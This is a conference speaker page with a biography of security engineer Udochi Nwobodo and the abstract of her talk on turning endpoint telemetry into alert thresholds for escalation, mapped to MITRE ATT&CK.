Udochi Nwobodo
Udochi Nwobodo is an Infrastructure and Product Security Engineer with over five years of experience securing large-scale systems at Adobe, Coinbase, and Juniper Networks. She has led efforts to design and deploy cloud security solutions, integrate security into product lifecycles, and build vulnerability management programs that scale with business needs.
Her work spans cloud, container, application security and modern detection engineering. Beyond technical execution, Udochi focuses on strategic impact: enabling teams to balance speed with security, aligning detection thresholds with business risk, and turning raw telemetry into meaningful decisions.
She holds a Master’s degree in Cybersecurity along with CISSP and CISM certifications. Udochi is passionate about bridging the gap between engineering and strategy, helping organizations move from reactive security to proactive resilience.
Session
Security teams drown in endpoint telemetry: processes spawned, commands executed, binaries triggered. But not every log line should become an alert, and not every alert should trigger a 2 a.m. wake-up call. The real challenge is knowing when a query result crosses the line from “informational” to “actionable.”
In this talk, I’ll walk through how different types of endpoint queries; single-process anomalies, correlated multi-event queries, and time-bounded patterns; map to thresholds that determine whether engineers should escalate or suppress. We’ll explore practical heuristics for building alert thresholds that balance false positives and false negatives, tie signals back to MITRE ATT&CK techniques, and prioritize based on host and user context.
Using an open-source EDR as a demo environment, I’ll showcase how raw suspicious process data can be transformed into high-confidence detections. The goal: give engineers and SOC analysts a framework for deciding not just what they can detect, but when they should start worrying.